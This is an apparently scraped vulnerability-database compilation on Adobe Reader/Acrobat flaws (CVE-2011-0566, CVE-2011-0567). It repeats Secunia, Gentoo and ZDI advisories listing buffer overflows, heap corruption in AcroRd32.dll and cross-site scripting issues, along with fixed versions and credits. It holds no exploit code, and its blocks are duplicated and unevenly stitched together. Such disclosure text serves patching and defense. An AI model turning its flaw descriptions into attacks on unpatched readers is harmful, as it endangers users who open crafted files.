Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43207/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting attacks and compromise a user's system. 2) An unspecified error can be exploited to corrupt memory. 3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges. 5) An unspecified error when parsing images can be exploited to corrupt memory. 6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory. 11) An input validation error can be exploited to conduct cross-site scripting attacks. 13) An unspecified error can be exploited to corrupt memory. 14) A boundary error when decoding U3D image data in an IFF file can be exploited to cause a buffer overflow. 15) A boundary error when decoding U3D image data in a RGBA file can be exploited to cause a buffer overflow. 16) A boundary error when decoding U3D image data in a BMP file can be exploited to cause a buffer overflow. 17) A boundary error when decoding U3D image data in a PSD file can be exploited to cause a buffer overflow. 18) An input validation error when parsing fonts may allow code execution. 19) A boundary error when decoding U3D image data in a FLI file can be exploited to cause a buffer overflow. 20) An error in 2d.dll when parsing height and width values of RLE_8 compressed BMP files can be exploited to cause a heap-based buffer overflow. 21) An integer overflow in ACE.dll when parsing certain ICC data can be exploited to cause a buffer overflow. 22) A boundary error in rt3d.dll when parsing bits per pixel and number of colors if 4/8-bit RLE compressed BMP files can be exploited to cause a heap-based buffer overflow. 23) An error in the U3D implementation when handling the Parent Node count can be exploited to cause a buffer overflow. 24) A boundary error when processing JPEG files embedded in a PDF file can be exploited to corrupt heap memory. 26) An input validation error can be exploited to conduct cross-site scripting attacks. 28) A boundary error in rt3d.dll when parsing certain files can be exploited to cause a stack-based buffer overflow. 29) An integer overflow in the U3D implementation when parsing a ILBM texture file can be exploited to cause a buffer overflow. 30) Some vulnerabilities are caused due to vulnerabilities in the bundled version of Adobe Flash Player. For more information: SA43267 The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1 and prior, and 10.0 and prior. SOLUTION: Update to version 8.2.6, 9.4.2, or 10.0.1. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: 2) Bing Liu, Fortinet's FortiGuard Labs. 6) Abdullah Ada via ZDI. 8) Haifei Li, Fortinet's FortiGuard Labs. 14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI. 21) Sebastian Apelt via ZDI. 23) el via ZDI. 14) Sean Larsson, iDefense Labs. 28) An anonymous person via ZDI. The vendor also credits: 1) Mitja Kolsek, ACROS Security. 3) Matthew Pun. 4, 5, 18) Tavis Ormandy, Google Security Team. 7) James Quirk. 9) Brett Gervasoni, Sense of Security. 10) Joe Schatz. 11, 26) Billy Rios, Google Security Team. 12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar. 13) CESG. 25) Will Dormann, CERT. 27) Marc Schoenefeld, Red Hat Security Response Team. ORIGINAL ADVISORY: Adobe (APSB11-03) http://www.adobe.com/support/security/bulletins/apsb11-03.html http://www.adobe.com/support/security/bulletins/apsb11-02.html ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-065/ http://www.zerodayinitiative.com/advisories/ZDI-11-066/ http://www.zerodayinitiative.com/advisories/ZDI-11-067/ http://www.zerodayinitiative.com/advisories/ZDI-11-068/ http://www.zerodayinitiative.com/advisories/ZDI-11-069/ http://www.zerodayinitiative.com/advisories/ZDI-11-070/ http://www.zerodayinitiative.com/advisories/ZDI-11-071/ http://www.zerodayinitiative.com/advisories/ZDI-11-072/ http://www.zerodayinitiative.com/advisories/ZDI-11-073/ http://www.zerodayinitiative.com/advisories/ZDI-11-074/ http://www.zerodayinitiative.com/advisories/ZDI-11-075/ http://www.zerodayinitiative.com/advisories/ZDI-11-077/ FortiGuard Labs: http://www.fortiguard.com/advisory/FGA-2011-06.html iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201201-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Adobe Reader: Multiple vulnerabilities Date: January 30, 2012 Bugs: #354211, #382969, #393481 ID: 201201-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in Adobe Reader might allow remote attackers to execute arbitrary code or conduct various other attacks. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-text/acroread < 9.4.7 >= 9.4.7=20 Description =========== Multiple vulnerabilities have been discovered in Adobe Reader. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could entice a user to open a specially crafted PDF file using Adobe Reader, possibly resulting in the remote execution of arbitrary code, a Denial of Service, or other impact. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Reader users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7" References ========== [ 1 ] CVE-2010-4091 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091 [ 2 ] CVE-2011-0562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562 [ 3 ] CVE-2011-0563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563 [ 4 ] CVE-2011-0565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565 [ 5 ] CVE-2011-0566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566 [ 6 ] CVE-2011-0567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567 [ 7 ] CVE-2011-0570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570 [ 8 ] CVE-2011-0585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585 [ 9 ] CVE-2011-0586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586 [ 10 ] CVE-2011-0587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587 [ 11 ] CVE-2011-0588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588 [ 12 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589 [ 13 ] CVE-2011-0590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590 [ 14 ] CVE-2011-0591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591 [ 15 ] CVE-2011-0592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592 [ 16 ] CVE-2011-0593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593 [ 17 ] CVE-2011-0594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594 [ 18 ] CVE-2011-0595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595 [ 19 ] CVE-2011-0596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596 [ 20 ] CVE-2011-0598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598 [ 21 ] CVE-2011-0599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599 [ 22 ] CVE-2011-0600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600 [ 23 ] CVE-2011-0602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602 [ 24 ] CVE-2011-0603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603 [ 25 ] CVE-2011-0604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604 [ 26 ] CVE-2011-0605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605 [ 27 ] CVE-2011-0606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606 [ 28 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130 [ 29 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134 [ 30 ] CVE-2011-2135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135 [ 31 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136 [ 32 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137 [ 33 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138 [ 34 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139 [ 35 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140 [ 36 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414 [ 37 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415 [ 38 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416 [ 39 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417 [ 40 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424 [ 41 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425 [ 42 ] CVE-2011-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431 [ 43 ] CVE-2011-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432 [ 44 ] CVE-2011-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433 [ 45 ] CVE-2011-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434 [ 46 ] CVE-2011-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435 [ 47 ] CVE-2011-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436 [ 48 ] CVE-2011-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437 [ 49 ] CVE-2011-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438 [ 50 ] CVE-2011-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439 [ 51 ] CVE-2011-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440 [ 52 ] CVE-2011-2441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441 [ 53 ] CVE-2011-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442 [ 54 ] CVE-2011-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462 [ 55 ] CVE-2011-4369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201201-19.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
VAR-201102-0022 CVE-2011-0566 Adobe Reader and Acrobat Vulnerable to arbitrary code execution CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image, a different vulnerability than CVE-2011-0567 and CVE-2011-0603. Adobe Reader and Acrobat Any code that could be executed or service disruption (DoS) There is a vulnerability that becomes a condition. This vulnerability CVE-2011-0567 and CVE-2011-0603 Is a different vulnerability.Arbitrary code execution or service disruption via a crafted image by a third party (DoS) There is a possibility of being put into a state. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected. For more information: SA43207 SOLUTION: Updated packages are available via Red Hat Network. ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: Adobe Reader / Acrobat Multiple Vulnerabilities SECUNIA ADVISORY ID: SA43207 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43207/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 RELEASE DATE: 2011-02-09 DISCUSS ADVISORY: http://secunia.com/advisories/43207/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43207/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting attacks and compromise a user's system. 2) An unspecified error can be exploited to corrupt memory. 3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges. 4) An unspecified error may allow code execution. 5) An unspecified error when parsing images can be exploited to corrupt memory. 6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory. 7) An unspecified error in the Macintosh-based versions may allow code execution. 9) An unspecified error may allow code execution. 10) A input validation error may allow code execution. 11) An input validation error can be exploited to conduct cross-site scripting attacks. 13) An unspecified error can be exploited to corrupt memory. 14) A boundary error when decoding U3D image data in an IFF file can be exploited to cause a buffer overflow. 15) A boundary error when decoding U3D image data in a RGBA file can be exploited to cause a buffer overflow. 16) A boundary error when decoding U3D image data in a BMP file can be exploited to cause a buffer overflow. 17) A boundary error when decoding U3D image data in a PSD file can be exploited to cause a buffer overflow. 18) An input validation error when parsing fonts may allow code execution. 19) A boundary error when decoding U3D image data in a FLI file can be exploited to cause a buffer overflow. 20) An error in 2d.dll when parsing height and width values of RLE_8 compressed BMP files can be exploited to cause a heap-based buffer overflow. 21) An integer overflow in ACE.dll when parsing certain ICC data can be exploited to cause a buffer overflow. 22) A boundary error in rt3d.dll when parsing bits per pixel and number of colors if 4/8-bit RLE compressed BMP files can be exploited to cause a heap-based buffer overflow. 23) An error in the U3D implementation when handling the Parent Node count can be exploited to cause a buffer overflow. 24) A boundary error when processing JPEG files embedded in a PDF file can be exploited to corrupt heap memory. 25) An unspecified error when parsing images may allow code execution. 26) An input validation error can be exploited to conduct cross-site scripting attacks. 27) An unspecified error in the Macintosh-based versions may allow code execution. 28) A boundary error in rt3d.dll when parsing certain files can be exploited to cause a stack-based buffer overflow. 29) An integer overflow in the U3D implementation when parsing a ILBM texture file can be exploited to cause a buffer overflow. 30) Some vulnerabilities are caused due to vulnerabilities in the bundled version of Adobe Flash Player. For more information: SA43267 The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1 and prior, and 10.0 and prior. SOLUTION: Update to version 8.2.6, 9.4.2, or 10.0.1. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: 2) Bing Liu, Fortinet's FortiGuard Labs. 6) Abdullah Ada via ZDI. 8) Haifei Li, Fortinet's FortiGuard Labs. 14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI. 21) Sebastian Apelt via ZDI. 23) el via ZDI. 14) Sean Larsson, iDefense Labs. 28) An anonymous person via ZDI. The vendor also credits: 1) Mitja Kolsek, ACROS Security. 3) Matthew Pun. 4, 5, 18) Tavis Ormandy, Google Security Team. 7) James Quirk. 9) Brett Gervasoni, Sense of Security. 10) Joe Schatz. 11, 26) Billy Rios, Google Security Team. 12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar. 13) CESG. 25) Will Dormann, CERT. 27) Marc Schoenefeld, Red Hat Security Response Team. ORIGINAL ADVISORY: Adobe (APSB11-03) http://www.adobe.com/support/security/bulletins/apsb11-03.html http://www.adobe.com/support/security/bulletins/apsb11-02.html ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-065/ http://www.zerodayinitiative.com/advisories/ZDI-11-066/ http://www.zerodayinitiative.com/advisories/ZDI-11-067/ http://www.zerodayinitiative.com/advisories/ZDI-11-068/ http://www.zerodayinitiative.com/advisories/ZDI-11-069/ http://www.zerodayinitiative.com/advisories/ZDI-11-070/ http://www.zerodayinitiative.com/advisories/ZDI-11-071/ http://www.zerodayinitiative.com/advisories/ZDI-11-072/ http://www.zerodayinitiative.com/advisories/ZDI-11-073/ http://www.zerodayinitiative.com/advisories/ZDI-11-074/ http://www.zerodayinitiative.com/advisories/ZDI-11-075/ http://www.zerodayinitiative.com/advisories/ZDI-11-077/ FortiGuard Labs: http://www.fortiguard.com/advisory/FGA-2011-06.html iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201201-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Adobe Reader: Multiple vulnerabilities Date: January 30, 2012 Bugs: #354211, #382969, #393481 ID: 201201-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in Adobe Reader might allow remote attackers to execute arbitrary code or conduct various other attacks. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-text/acroread < 9.4.7 >= 9.4.7=20 Description =========== Multiple vulnerabilities have been discovered in Adobe Reader. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Reader users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7" References ========== [ 1 ] CVE-2010-4091 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091 [ 2 ] CVE-2011-0562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562 [ 3 ] CVE-2011-0563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563 [ 4 ] CVE-2011-0565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565 [ 5 ] CVE-2011-0566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566 [ 6 ] CVE-2011-0567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567 [ 7 ] CVE-2011-0570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570 [ 8 ] CVE-2011-0585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585 [ 9 ] CVE-2011-0586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586 [ 10 ] CVE-2011-0587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587 [ 11 ] CVE-2011-0588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588 [ 12 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589 [ 13 ] CVE-2011-0590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590 [ 14 ] CVE-2011-0591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591 [ 15 ] CVE-2011-0592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592 [ 16 ] CVE-2011-0593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593 [ 17 ] CVE-2011-0594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594 [ 18 ] CVE-2011-0595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595 [ 19 ] CVE-2011-0596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596 [ 20 ] CVE-2011-0598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598 [ 21 ] CVE-2011-0599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599 [ 22 ] CVE-2011-0600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600 [ 23 ] CVE-2011-0602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602 [ 24 ] CVE-2011-0603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603 [ 25 ] CVE-2011-0604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604 [ 26 ] CVE-2011-0605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605 [ 27 ] CVE-2011-0606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606 [ 28 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130 [ 29 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134 [ 30 ] CVE-2011-2135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135 [ 31 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136 [ 32 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137 [ 33 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138 [ 34 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139 [ 35 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140 [ 36 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414 [ 37 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415 [ 38 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416 [ 39 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417 [ 40 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424 [ 41 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425 [ 42 ] CVE-2011-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431 [ 43 ] CVE-2011-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432 [ 44 ] CVE-2011-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433 [ 45 ] CVE-2011-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434 [ 46 ] CVE-2011-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435 [ 47 ] CVE-2011-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436 [ 48 ] CVE-2011-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437 [ 49 ] CVE-2011-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438 [ 50 ] CVE-2011-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439 [ 51 ] CVE-2011-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440 [ 52 ] CVE-2011-2441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441 [ 53 ] CVE-2011-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442 [ 54 ] CVE-2011-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462 [ 55 ] CVE-2011-4369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201201-19.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
VAR-201102-0023 CVE-2011-0567 Adobe Reader and Acrobat Vulnerable to arbitrary code execution CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
AcroRd32.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image that triggers an incorrect pointer calculation, leading to heap memory corruption, a different vulnerability than CVE-2011-0566 and CVE-2011-0603. Adobe Reader and Acrobat Any code that could be executed or service disruption (DoS) There is a vulnerability that becomes a condition. This vulnerability CVE-2011-0566 and CVE-2011-0603 Is a different vulnerability.Arbitrary code execution or service disruption via a crafted image by a third party (DoS) There is a possibility of being put into a state. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within AcroRd32.dll. Initially, a pointer passed to memset can be miscalculated and the resulting copy operation corrupts heap memory. Later, the application attempts to use the modified data which can be leveraged to execute arbitrary code under the context of the user invoking the Reader application. Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected. For more information: SA43207 SOLUTION: Updated packages are available via Red Hat Network. The specific flaw exists within AcroRd32.dll. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb11-03.html -- Disclosure Timeline: 2010-06-30 - Vulnerability reported to vendor 2011-02-08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Abdullah Ada -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: Adobe Reader / Acrobat Multiple Vulnerabilities SECUNIA ADVISORY ID: SA43207 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43207/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 RELEASE DATE: 2011-02-09 DISCUSS ADVISORY: http://secunia.com/advisories/43207/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity 